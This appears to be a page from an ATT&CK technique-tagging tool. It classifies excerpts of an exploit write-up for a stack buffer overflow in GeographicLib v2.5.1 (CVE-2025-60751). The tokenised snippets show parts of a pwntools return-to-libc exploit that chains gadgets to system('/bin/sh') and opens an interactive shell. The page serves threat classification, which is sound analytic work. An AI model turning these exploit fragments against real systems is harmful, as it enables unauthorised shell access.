[webapps] GeographicLib v2.5.1 - stack buffer overflow
ATT&CK techniques detected
T1059.004Unix Shell
97%
"" / bin / sh " address payload + = p64 ( system _ addr ) # system ( " / bin / sh " ) payload + = p64 ( exit _ addr ) # exit io = process ( binary _ path, env = { " asan _ options " : " detect _ stack _ use _ after _ return = 1 " } ) io. sendline ( payload ) io. interactive ( )"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.004Unix Shell
84%
". io / cve - 2025 - 60751 / from pwn import * # - - - initial config - - - binary _ path = ". / geoconvert " elf = elf ( binary _ path ) context. binary = elf context. arch = ' amd64 ' # - - - replace the addresses with your own ones - - - pop _ rdi = 0x000055555558befd ret _ gad…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1587.004Exploits
69%
"[ webapps ] geographiclib v2. 5. 1 - stack buffer overflow exploit title : geographiclib v2. 5. 1 - stack buffer overflow date of discovery : 20 august 2025 exploit author : me zer0matt ( rosario matteo grammatico ) < https : / / github. com / zer0matt > vendor homepage : https :…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
GeographicLib v2.5.1 - stack buffer overflow